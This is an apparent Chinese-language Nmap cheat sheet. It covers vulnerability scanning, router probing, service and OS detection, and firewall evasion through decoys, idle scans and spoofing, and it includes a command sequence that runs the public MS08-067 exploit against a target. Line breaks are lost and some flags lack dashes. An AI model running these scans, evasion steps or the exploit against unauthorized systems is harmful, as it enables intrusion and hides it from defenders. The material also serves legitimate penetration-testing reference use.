首页 > 代码库 > Nmap
Nmap
常用主机扫描
sudo nmap -T4 -sT -A -Pn --script=smb-check-vulns IPsudo nmap -T4 -sV -O IPsudo nmap -T5 -O -A -v --script vuln IP 利用脚本进行简单漏洞扫描
MS08067 – 不使用 Metasploit$ nmap v p 139, 445 script=smbcheckvulns scriptargs=unsafe=1 IP$ searchsploit ms08067 $ python /usr/share/exploitdb/platforms/windows/remote/7132.py IP
web扫描
nmap -sS -sV --script=vulscan/vulscan.nse target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target nmap -sV --script=vuln target nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
路由探测
nmap -p1-25,80,512-515,2001,4001,6001,9001 IP段nmap -sU -p69 -nvv IP段 (大多数路由器支持TFTP服务)nmap -O -F -n IP #路由器系统扫描
高级用法
#侦测服务版本$nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt#扫做系统扫描$nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt#系统和服务检测$nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect-iL LiveHosts.txtNmap – 躲避防火墙#分段: $nmap -f#修改默认MTU 大小,但必须为8 的倍数(8,16,24,32等等)$nmap --mtu 24#生成随机数量的欺骗$nmap -D RND:10 [target]#手动指定欺骗使用的IP$nmap -D decoy1,decoy2,decoy3 etc.#僵尸网络扫描,首先需要找到僵尸网络的IP$nmap -sI [Zombie IP] [Target IP]#指定源端口号$nmap --source-port 80 IP#在每个扫描数据包后追加随机数量的数据$nmap --data-length 25IP#MAC 地址欺骗,可以生成不同主机的MAC 地址$nmap --spoof-mac Dell/Apple/3Com IP
导出结果
-oS (ScRipT KIdd|3oUTpuT)保存扫描结果输出。-oN/oG (Grep 输出)-oA (输出至所有格式)
相关阅读
nmap扫描原理 http://www.91ri.org/8655.html
Nmap
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。